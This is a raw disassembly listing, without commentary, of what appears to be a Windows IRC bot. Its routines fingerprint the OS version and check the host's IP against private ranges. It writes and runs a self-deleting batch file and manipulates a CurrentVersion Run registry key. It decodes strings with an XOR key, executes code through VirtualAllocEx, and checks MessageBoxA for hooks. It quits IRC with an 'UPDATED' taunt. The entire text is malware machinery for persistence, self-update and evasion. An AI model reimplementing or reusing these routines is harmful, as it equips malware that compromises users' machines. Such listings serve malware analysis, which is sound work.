loc_419579: ; CODE XREF: sub_419545+1Fj
xor eax, eax
loc_41957B: ; CODE XREF: sub_419545+32j
cmp dword ptr [eax+4], 0
setnz al
call sub_404A1B
retn
sub_419545 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_419588 proc near ; CODE XREF: sub_419AFD:loc_419B21p
mov eax, dword_428110
mov edx, dword_428114
lea ecx, ds:428118h[eax*4]
push esi
mov esi, eax
mov eax, dword_428118[edx*4]
add eax, [ecx]
and eax, 3FFFFFFFh
inc esi
cmp esi, 37h
mov [ecx], eax
jnz short loc_4195B5
xor esi, esi
loc_4195B5: ; CODE XREF: sub_419588+29j
inc edx
cmp edx, 37h
jnz short loc_4195BD
xor edx, edx
loc_4195BD: ; CODE XREF: sub_419588+31j
mov dword_428110, esi
mov dword_428114, edx
sar eax, 6
pop esi
retn
sub_419588 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4195CE proc near ; CODE XREF: sub_40207D+128p
; sub_417C7B:loc_417D8Cp ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
lea eax, [ebp+var_10]
push eax
call ds:dword_41D058 ; QueryPerformanceCounter
test eax, eax
jz short loc_41964A
lea eax, [ebp+var_8]
push eax
call ds:off_41D064
test eax, eax
jz short loc_41964A
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
call sub_41C780
push 0
push 15180h
push edx
push eax
call sub_411BB0
push 0
push 0E10h
push ebx
push ecx
mov dword_4280F8, eax
mov dword_4280FC, edx
call sub_411BB0
push 0
push 3Ch
push ebx
push ecx
mov dword_428100, eax
mov dword_428104, edx
call sub_41C780
mov dword_428108, eax
mov dword_42810C, edx
loc_41964A: ; CODE XREF: sub_4195CE+13j
; sub_4195CE+21j
pop ebx
leave
retn
sub_4195CE endp
; =============== S U B R O U T I N E =======================================
sub_41964D proc near ; CODE XREF: sub_40207D+EFp
; sub_417C7B+BCp ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
push 0
push esi
call sub_407F20
add esp, 0Ch
cmp [esp+arg_4], 0
push [esp+arg_0]
push esi
jz short loc_41966F
push 1002h
jmp short loc_419671
; ---------------------------------------------------------------------------
loc_41966F: ; CODE XREF: sub_41964D+19j
push 7
loc_419671: ; CODE XREF: sub_41964D+20j
push 800h
call ds:off_41D054
mov eax, esi
retn
sub_41964D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41967F proc near ; CODE XREF: sub_40207D+DAp
; sub_417C7B+8Bp ...
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, dword_423064
xor eax, ebp
mov [ebp+74h+var_4], eax
push ebx
push edi
lea eax, [ebp+74h+var_98]
push eax
mov ebx, ecx
mov [ebp+74h+var_98], 94h
call ds:dword_41D068 ; GetVersionExA
push ebx
xor edi, edi
push edi
push esi
call sub_407F20
add esp, 0Ch
cmp [ebp+74h+var_94], 6
jnz short loc_4196C8
cmp [ebp+74h+var_90], edi
jnz short loc_419733
push offset aVis ; "VIS"
jmp short loc_419738
; ---------------------------------------------------------------------------
loc_4196C8: ; CODE XREF: sub_41967F+3Bj
cmp [ebp+74h+var_94], 5
jnz short loc_4196F4
cmp [ebp+74h+var_90], 2
jnz short loc_4196DB
push offset a2k3 ; "2K3"
jmp short loc_419738
; ---------------------------------------------------------------------------
loc_4196DB: ; CODE XREF: sub_41967F+53j
cmp [ebp+74h+var_90], 1
jnz short loc_4196E8
push offset aXp_0 ; "XP"
jmp short loc_419738
; ---------------------------------------------------------------------------
loc_4196E8: ; CODE XREF: sub_41967F+60j
cmp [ebp+74h+var_90], edi
jnz short loc_419733
push offset a2k ; "2K"
jmp short loc_419738
; ---------------------------------------------------------------------------
loc_4196F4: ; CODE XREF: sub_41967F+4Dj
cmp [ebp+74h+var_94], 4
jnz short loc_419733
cmp [ebp+74h+var_90], 5Ah
jnz short loc_419707
push offset aMe ; "ME"
jmp short loc_419738
; ---------------------------------------------------------------------------
loc_419707: ; CODE XREF: sub_41967F+7Fj
cmp [ebp+74h+var_90], 1
jnz short loc_419714
push offset a98 ; "98"
jmp short loc_419738
; ---------------------------------------------------------------------------
loc_419714: ; CODE XREF: sub_41967F+8Cj
cmp [ebp+74h+var_90], edi
jnz short loc_419733
cmp [ebp+74h+var_88], 2
jnz short loc_419726
push offset aNt ; "NT"
jmp short loc_419738
; ---------------------------------------------------------------------------
loc_419726: ; CODE XREF: sub_41967F+9Ej
cmp [ebp+74h+var_88], 1
jnz short loc_419745
push offset a95 ; "95"
jmp short loc_419738
; ---------------------------------------------------------------------------
loc_419733: ; CODE XREF: sub_41967F+40j
; sub_41967F+6Cj ...
push offset aUnk ; "UNK"
loc_419738: ; CODE XREF: sub_41967F+47j
; sub_41967F+5Aj ...
lea eax, [ebx-1]
push eax
push esi
call sub_402EBA
add esp, 0Ch
loc_419745: ; CODE XREF: sub_41967F+ABj
mov eax, esi
lea edx, [eax+1]
loc_41974A: ; CODE XREF: sub_41967F+D0j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41974A
sub eax, edx
cmp [ebp+74h+arg_0], cl
mov [eax+esi], cl
jz loc_4197E1
push ebx
call sub_402A14
mov edi, eax
push edi
call sub_402E11
push eax
push 0
push edi
call sub_407F20
add esp, 14h
push [ebp+74h+var_8C]
lea eax, [ebp+74h+var_84]
push [ebp+74h+var_90]
push [ebp+74h+var_94]
push eax
push esi
push offset aOsMicrosoftWin ; "[OS: Microsoft Windows %s %s (%i.%i bui"...
push edi
call sub_402E11
pop ecx
dec eax
push eax
push edi
call sub_402EBA
mov eax, edi
add esp, 20h
lea ecx, [eax+1]
loc_4197A3: ; CODE XREF: sub_41967F+129j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4197A3
push ebx
sub eax, ecx
push 0
push esi
mov [eax+edi], dl
call sub_407F20
push edi
push offset aS_5 ; "%s"
dec ebx
push ebx
push esi
call sub_402EBA
mov eax, esi
add esp, 1Ch
lea ecx, [eax+1]
loc_4197CE: ; CODE XREF: sub_41967F+154j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4197CE
sub eax, ecx
push edi
mov [eax+esi], dl
call sub_402F67
pop ecx
loc_4197E1: ; CODE XREF: sub_41967F+DAj
mov ecx, [ebp+74h+var_4]
pop edi
xor ecx, ebp
mov eax, esi
pop ebx
call sub_402ADC
add ebp, 74h
leave
retn
sub_41967F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4197F4 proc near ; CODE XREF: sub_401DA7+53p
; sub_40207D+101p ...
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push ebx
push edi
xor eax, eax
lea edi, [ebp+var_18]
stosd
stosd
mov ebx, ecx
push ebx
stosd
push 0
push esi
mov [ebp+var_1C], 10h
stosd
call sub_407F20
add esp, 0Ch
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call ds:dword_41D238 ; getsockname
movzx eax, [ebp+var_11]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_13]
push eax
movzx eax, [ebp+var_14]
push eax
push offset aD_D_D_D_0 ; "%d.%d.%d.%d"
dec ebx
push ebx
push esi
call sub_402EBA
mov eax, esi
add esp, 1Ch
lea ecx, [eax+1]
loc_41985E: ; CODE XREF: sub_4197F4+6Fj
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41985E
sub eax, ecx
mov ecx, [ebp+var_8]
pop edi
mov [eax+esi], dl
xor ecx, ebp
mov eax, esi
pop ebx
call sub_402ADC
leave
retn
sub_4197F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41987A proc near ; CODE XREF: sub_4022DF+10Cp
; sub_417E66+A5p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push esi
mov esi, ecx
mov cl, [eax]
test cl, cl
push edi
jz short loc_4198E3
loc_419888: ; CODE XREF: sub_41987A+24j
mov dl, [esi]
cmp dl, 2Ah
jz short loc_4198A0
cmp dl, cl
jz short loc_419898
cmp dl, 3Fh
jnz short loc_4198BE
loc_419898: ; CODE XREF: sub_41987A+17j
inc esi
inc eax
mov cl, [eax]
test cl, cl
jnz short loc_419888
loc_4198A0: ; CODE XREF: sub_41987A+13j
mov cl, [eax]
test cl, cl
jz short loc_4198E3
mov edi, [ebp+var_4]
loc_4198A9: ; CODE XREF: sub_41987A+5Fj
mov dl, [esi]
cmp dl, 2Ah
jnz short loc_4198C2
inc esi
cmp byte ptr [esi], 0
jz short loc_4198DD
mov [ebp+var_4], esi
lea edi, [eax+1]
jmp short loc_4198D5
; ---------------------------------------------------------------------------
loc_4198BE: ; CODE XREF: sub_41987A+1Cj
xor eax, eax
jmp short loc_4198EF
; ---------------------------------------------------------------------------
loc_4198C2: ; CODE XREF: sub_41987A+34j
cmp dl, cl
jz short loc_4198D3
cmp dl, 3Fh
jz short loc_4198D3
mov esi, [ebp+var_4]
mov eax, edi
inc edi
jmp short loc_4198D5
; ---------------------------------------------------------------------------
loc_4198D3: ; CODE XREF: sub_41987A+4Aj
; sub_41987A+4Fj
inc esi
inc eax
loc_4198D5: ; CODE XREF: sub_41987A+42j
; sub_41987A+57j
mov cl, [eax]
test cl, cl
jnz short loc_4198A9
jmp short loc_4198E3
; ---------------------------------------------------------------------------
loc_4198DD: ; CODE XREF: sub_41987A+3Aj
xor eax, eax
inc eax
jmp short loc_4198EF
; ---------------------------------------------------------------------------
loc_4198E2: ; CODE XREF: sub_41987A+6Cj
inc esi
loc_4198E3: ; CODE XREF: sub_41987A+Cj
; sub_41987A+2Aj ...
cmp byte ptr [esi], 2Ah
jz short loc_4198E2
xor eax, eax
cmp [esi], al
setz al
loc_4198EF: ; CODE XREF: sub_41987A+46j
; sub_41987A+66j
pop edi
pop esi
leave
retn
sub_41987A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4198F3 proc near ; CODE XREF: sub_419CB0+14Ap
var_23C = byte ptr -23Ch
var_23B = byte ptr -23Bh
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 23Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
xor ebx, ebx
push 37h
lea eax, [ebp+var_3B]
push ebx
push eax
mov [ebp+var_3C], bl
call sub_407F20
mov esi, 0FFh
push esi
lea eax, [ebp+var_23B]
push ebx
push eax
mov [ebp+var_23C], bl
call sub_407F20
push esi
lea eax, [ebp+var_13B]
push ebx
push eax
mov [ebp+var_13C], bl
call sub_407F20
add esp, 24h
push 100h
lea eax, [ebp+var_13C]
push eax
push ebx
call ds:dword_41D0E0 ; GetModuleHandleA
push eax
call ds:dword_41D060 ; GetModuleFileNameA
lea eax, [ebp+var_13C]
push eax
push eax
lea eax, [ebp+var_23C]
push offset a@echoOff1DelSI ; "@echo off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
push eax
call sub_403481
push 104h
call sub_402A14
mov esi, eax
push esi
call sub_402E11
add esp, 18h
dec eax
push eax
push esi
call ds:dword_41D0F0 ; GetSystemDirectoryA
call sub_40372F
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call sub_40372F
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call sub_40372F
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call sub_40372F
push 0Ah
cdq
pop ecx
idiv ecx
push edx
call sub_40372F
push 0Ah
cdq
pop ecx
idiv ecx
push edx
call sub_40372F
push 0Ah
pop ecx
cdq
idiv ecx
lea eax, [ebp+var_3C]
push edx
push esi
push offset aSTmpIIICCC_bat ; "%s\\tmp-%i%i%i-%c%c%c.bat"
push eax
call sub_403481
push esi
call sub_402F67
lea eax, [ebp+var_3C]
push offset aW ; "w"
push eax
call sub_4035C0
mov esi, eax
add esp, 30h
cmp esi, ebx
jz short loc_419A41
lea eax, [ebp+var_23C]
push eax
push offset aS_6 ; "%s"
push esi
call sub_4035D3
push esi
call sub_403890
add esp, 10h
push ebx
push ebx
push ebx
lea eax, [ebp+var_3C]
push eax
push ebx
push ebx
call ds:dword_41D1E0
loc_419A41: ; CODE XREF: sub_4198F3+122j
mov ecx, [ebp+var_4]
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_4198F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A4F proc near ; CODE XREF: sub_41BF2B+199p
; sub_41C2E2+1C1p
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 170h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push ebx
push esi
push edi
xor ebx, ebx
push 40h
lea eax, [ebp+var_168]
push ebx
push eax
mov [ebp+var_16C], ebx
call sub_407F20
xor eax, eax
mov [ebp+var_124], ebx
lea edi, [ebp+var_120]
stosd
stosd
mov esi, 103h
push esi
stosd
lea eax, [ebp+var_113]
push ebx
push eax
mov [ebp+var_114], bl
call sub_407F20
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_114]
push esi
push eax
call sub_403802
add esp, 28h
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_16C]
push eax
push ebx
push ebx
push 28h
push ebx
push ebx
push ebx
lea eax, [ebp+var_114]
push eax
push ebx
call ds:dword_41D05C ; CreateProcessA
mov ecx, [ebp+var_8]
test eax, eax
pop edi
setnz al
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_419A4F endp
; ---------------------------------------------------------------------------
push 0
call sub_40390C
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_419AFD proc near ; CODE XREF: sub_413DDD+81p
; sub_413DDD+94p ...
push esi
mov esi, eax
xor eax, eax
inc eax
sub eax, ebx
add esi, eax
cmp esi, 1
jg short loc_419B10
mov eax, ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_419B10: ; CODE XREF: sub_419AFD+Dj
push 2
pop eax
cmp esi, eax
jle short loc_419B1D
loc_419B17: ; CODE XREF: sub_419AFD+1Ej
add eax, eax
cmp eax, esi
jl short loc_419B17
loc_419B1D: ; CODE XREF: sub_419AFD+18j
push edi
lea edi, [eax-1]
loc_419B21: ; CODE XREF: sub_419AFD+2Dj
call sub_419588
and eax, edi
cmp eax, esi
jge short loc_419B21
pop edi
add eax, ebx
pop esi
retn
sub_419AFD endp
; =============== S U B R O U T I N E =======================================
sub_419B31 proc near ; CODE XREF: sub_4022DF+423p
; sub_413DDD:loc_41430Dp ...
and dword_428110, 0
push 0
mov dword_428114, 1Fh
call sub_40390C
mov edx, 3FFFFFFFh
and eax, edx
pop ecx
mov dword_428118, eax
mov dword_42811C, 1
mov eax, offset dword_428118
push esi
loc_419B66: ; CODE XREF: sub_419B31+48j
lea ecx, [eax+4]
mov esi, [ecx]
add esi, [eax]
and esi, edx
mov [eax+8], esi
mov eax, ecx
cmp eax, offset dword_4281EC
jl short loc_419B66
pop esi
retn
sub_419B31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B7D proc near ; CODE XREF: sub_417C7B+E6p
; sub_41AFF3+38Ep
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
push dword_42851C
mov [ebp+var_14], 0
xor eax, eax
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
push 10h
pop ecx
lea esi, [ebp+var_14]
stosb
call sub_4197F4
pop ecx
mov eax, esi
mov ecx, offset a192_168__ ; "192.168.*.*"
call sub_41987A
test eax, eax
jnz loc_419CA0
mov eax, esi
mov ecx, offset a10___ ; "10.*.*.*"
call sub_41987A
test eax, eax
jnz loc_419CA0
mov eax, esi
mov ecx, offset a111___ ; "111.*.*.*"
call sub_41987A
test eax, eax
jnz loc_419CA0
mov eax, esi
mov ecx, offset a15___ ; "15.*.*.*"
call sub_41987A
test eax, eax
jnz loc_419CA0
mov eax, esi
mov ecx, offset a16___ ; "16.*.*.*"
call sub_41987A
test eax, eax
jnz loc_419CA0
mov eax, esi
mov ecx, offset a101___ ; "101.*.*.*"
call sub_41987A
test eax, eax
jnz short loc_419CA0
mov eax, esi
mov ecx, offset a110___ ; "110.*.*.*"
call sub_41987A
test eax, eax
jnz short loc_419CA0
mov eax, esi
mov ecx, offset a112___ ; "112.*.*.*"
call sub_41987A
test eax, eax
jnz short loc_419CA0
mov eax, esi
mov ecx, offset a170_65__ ; "170.65.*.*"
call sub_41987A
test eax, eax
jnz short loc_419CA0
push 10h
pop esi
loc_419C57: ; CODE XREF: sub_419B7D+11Dj
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
push esi
push offset a172_D__ ; "172.%d.*.*"
stosd
lea eax, [ebp+var_24]
push 0Fh
push eax
call sub_402EBA
lea eax, [ebp+var_24]
add esp, 10h
lea edx, [eax+1]
loc_419C7A: ; CODE XREF: sub_419B7D+102j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419C7A
sub eax, edx
mov [ebp+eax+var_24], cl
lea eax, [ebp+var_14]
lea ecx, [ebp+var_24]
call sub_41987A
test eax, eax
jnz short loc_419CA0
inc esi
cmp esi, 1Fh
jbe short loc_419C57
xor al, al
jmp short loc_419CA2
; ---------------------------------------------------------------------------
loc_419CA0: ; CODE XREF: sub_419B7D+41j
; sub_419B7D+55j ...
mov al, 1
loc_419CA2: ; CODE XREF: sub_419B7D+121j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402ADC
leave
retn
sub_419B7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419CB0 proc near ; CODE XREF: sub_418884+11Cp
; sub_41BF2B+1C5p
var_2A8 = byte ptr -2A8h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_28B = byte ptr -28Bh
var_1CC = byte ptr -1CCh
var_1CB = byte ptr -1CBh
var_CC = byte ptr -0CCh
var_CB = byte ptr -0CBh
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2A8h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, 0BFh
xor ebx, ebx
push esi
mov [ebp+var_298], eax
lea eax, [ebp+var_CB]
push ebx
push eax
mov [ebp+var_CC], bl
call sub_407F20
add esp, 0Ch
push esi
lea eax, [ebp+var_28B]
push ebx
push eax
mov [ebp+var_28C], bl
call sub_407F20
add esp, 0Ch
push ebx
lea edi, [ebp+var_CC]
call sub_41BDFF
pop ecx
inc esi
push esi
mov eax, edi
push ebx
push eax
call sub_407F20
add esp, 0Ch
push esi
lea eax, [ebp+var_28C]
push ebx
push eax
call sub_407F20
add esp, 0Ch
push 0FFh
lea eax, [ebp+var_1CB]
push ebx
push eax
mov [ebp+var_1CC], bl
call sub_407F20
mov eax, dword_4357BC
mov eax, [eax]
mov [ebp+var_290], eax
mov eax, offset dword_4357B8
add esp, 0Ch
mov [ebp+var_294], eax
mov [ebp+var_2A0], eax
loc_419D69: ; CODE XREF: sub_419CB0+102j
mov eax, dword_4357BC
lea edi, [ebp+var_2A0]
lea esi, [ebp+var_294]
mov [ebp+var_29C], eax
call sub_40166F
test al, al
jz short loc_419DC0
mov edi, offset aRegistryMonito ; "Registry Monitor"
call sub_40164F
mov esi, eax
add esi, 5
push 11h
pop ecx
xor eax, eax
repe cmpsb
lea esi, [ebp+var_294]
jz short loc_419DB4
lea edi, [ebp+var_2A8]
call sub_40168C
jmp short loc_419D69
; ---------------------------------------------------------------------------
loc_419DB4: ; CODE XREF: sub_419CB0+F5j
call sub_40164F
mov eax, [eax]
call sub_4147FF
loc_419DC0: ; CODE XREF: sub_419CB0+D7j
mov edi, 100h
push edi
lea esi, [ebp+var_1CC]
mov ebx, offset byte_426B01
call sub_419F0A
pop ecx
mov eax, esi
push eax
push offset aSoftwareMicr_3 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_417722
add esp, 0Ch
push edi
mov eax, esi
push 0
push eax
call sub_407F20
add esp, 0Ch
call sub_4198F3
push [ebp+var_298]
mov edi, offset dword_42851C
push offset aQuitSYouKilled ; "QUIT :%s YOU KILLED ME :< --UPDATED\r\n"
call sub_417ABC
pop ecx
pop ecx
push 0
call ds:off_41D050
int 3 ; Trap to Debugger
jmp ds:off_41D08C
sub_419CB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E25 proc near ; CODE XREF: sub_41C2E2+31p
var_18 = byte ptr -18h
var_13 = byte ptr -13h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
call ds:dword_41D0C8 ; GetCurrentProcess
mov esi, offset dword_4207E0
lea edi, [ebp+var_10]
movsd
movsd
push 40h
push 3000h
movsb
push 6
mov ebx, eax
xor edi, edi
push edi
lea eax, [ebp+var_18]
push ebx
mov [ebp+var_10+3], eax
call ds:dword_41D0BC ; VirtualAllocEx
mov esi, eax
cmp esi, edi
jnz short loc_419E6E
loc_419E6A: ; CODE XREF: sub_419E25+58j
xor al, al
jmp short loc_419EA1
; ---------------------------------------------------------------------------
loc_419E6E: ; CODE XREF: sub_419E25+43j
push edi
push 40h
push 6
push esi
push ebx
call ds:dword_41D0C0 ; VirtualProtectEx
test eax, eax
jnz short loc_419E6A
mov eax, [ebp+var_10]
mov [esi], eax
mov eax, [ebp+var_C]
mov [esi+4], eax
call esi ; send
push 8000h
push edi
push esi
push ebx
call ds:dword_41D0C4 ; VirtualFreeEx
cmp [ebp+var_13], 0D0h
setnbe al
loc_419EA1: ; CODE XREF: sub_419E25+47j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_419E25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419EB0 proc near ; CODE XREF: sub_41C2E2+24p
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
push offset aMessageboxa_0 ; "MessageBoxA"
push offset aUser32_dll ; "user32.dll"
mov [ebp+var_C], 55h
mov [ebp+var_B], 8Bh
mov [ebp+var_A], 0ECh
mov [ebp+var_9], 81h
mov [ebp+var_8], 0ECh
call ds:off_41D0E4
push eax
call ds:off_41D0E8
push 5
mov esi, eax
pop ecx
xor eax, eax
lea edi, [ebp+var_C]
repe cmpsb
mov ecx, [ebp+var_4]
setz al
pop edi
xor ecx, ebp
pop esi
call sub_402ADC
leave
retn
sub_419EB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419F0A proc near ; CODE XREF: sub_40177B+81p
; sub_4019F3+81p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push edi
push [ebp+arg_0]
xor edi, edi
push edi
push esi
call sub_407F20
mov eax, ebx
add esp, 0Ch
lea ecx, [eax+1]
loc_419F23: ; CODE XREF: sub_419F0A+1Ej
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_419F23
sub eax, ecx
jz short loc_419F94
mov eax, [ebp+arg_0]
dec eax
mov [ebp+var_4], eax
loc_419F35: ; CODE XREF: sub_419F0A+88j
mov eax, offset aHfsknidfrvhfkk ; "hFSKniDFrvHFkKSe"
lea edx, [eax+1]
loc_419F3D: ; CODE XREF: sub_419F0A+38j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419F3D
sub eax, edx
jz short loc_419F4A
xor eax, eax
loc_419F4A: ; CODE XREF: sub_419F0A+3Cj
movsx ecx, byte ptr [edi+ebx]
movsx eax, byte ptr aHfsknidfrvhfkk[eax] ; "hFSKniDFrvHFkKSe"
xor ecx, eax
xor ecx, 0A9h
push ecx
push esi
push offset dword_42080C
push [ebp+var_4]
push esi
call sub_402EBA
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_419F75: ; CODE XREF: sub_419F0A+70j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_419F75
sub eax, ecx
mov [eax+esi], dl
mov eax, ebx
inc edi
lea ecx, [eax+1]
loc_419F87: ; CODE XREF: sub_419F0A+82j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_419F87
sub eax, ecx
cmp edi, eax
jb short loc_419F35
loc_419F94: ; CODE XREF: sub_419F0A+22j
mov eax, esi
pop edi
leave
retn
sub_419F0A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419F99 proc near ; CODE XREF: sub_41A456+28p
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 2Ch
push offset dword_421D10
call __SEH_prolog4
mov edi, ds:dword_41D104
call edi ; GetTickCount
mov [ebp+var_20], eax
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
mov esi, ds:off_41D028
call esi ; sub_4463D6
test eax, eax
jnz short loc_419FD4
loc_419FC9: ; CODE XREF: sub_419F99+61j
; sub_419F99+8Aj ...
call ds:dword_41D0EC ; RtlGetLastWin32Error
jmp loc_41A068
; ---------------------------------------------------------------------------
loc_419FD4: ; CODE XREF: sub_419F99+2Ej
cmp [ebp+var_38], 1
jz loc_41A066
jmp short loc_41A00E
; ---------------------------------------------------------------------------
loc_419FE0: ; CODE XREF: sub_419F99+79j
push [ebp+var_24]
call ds:off_41D0F8
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
call esi ; sub_4463D6
test eax, eax
jz short loc_419FC9
cmp [ebp+var_38], 1
jz short loc_41A066
call edi ; GetTickCount
sub eax, [ebp+var_20]
cmp eax, 12Ch
ja short loc_41A027
loc_41A00E: ; CODE XREF: sub_419F99+45j
cmp [ebp+var_38], 3
jz short loc_419FE0
lea eax, [ebp+var_3C]
push eax
push 1
push ebx
call ds:off_41D01C
test eax, eax
jz short loc_419FC9
jmp short loc_41A060
; ---------------------------------------------------------------------------
loc_41A027: ; CODE XREF: sub_419F99+73j
; sub_419F99+C5j
mov eax, 5B4h
jmp short loc_41A068
; ---------------------------------------------------------------------------
loc_41A02E: ; CODE XREF: sub_419F99+CBj
push [ebp+var_24]
call ds:off_41D0F8
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
call esi ; sub_4463D6
test eax, eax
jz loc_419FC9
cmp [ebp+var_38], 1
jz short loc_41A066
call edi ; GetTickCount
sub eax, [ebp+var_20]
cmp eax, 12Ch
ja short loc_41A027
loc_41A060: ; CODE XREF: sub_419F99+8Cj
cmp [ebp+var_38], 1
jnz short loc_41A02E
loc_41A066: ; CODE XREF: sub_419F99+3Fj
; sub_419F99+67j ...
xor eax, eax
loc_41A068: ; CODE XREF: sub_419F99+36j
; sub_419F99+93j
call __SEH_epilog4
retn
sub_419F99 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A06E proc near ; CODE XREF: sub_41A6D9+2C7p
; sub_41A6D9+36Ep
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
push 10h
pop esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_4]
xor edi, edi
push edi
mov [ebp+var_8], esi
call ds:off_41D034
test eax, eax
jnz short loc_41A095
loc_41A091: ; CODE XREF: sub_41A06E+5Fj
xor al, al
jmp short loc_41A106
; ---------------------------------------------------------------------------
loc_41A095: ; CODE XREF: sub_41A06E+21j
mov eax, [ebp+var_10]
mov [ebp+var_2C], eax
mov eax, [ebp+var_C]
mov [ebp+var_28], eax
lea eax, [ebp+var_8]
push eax
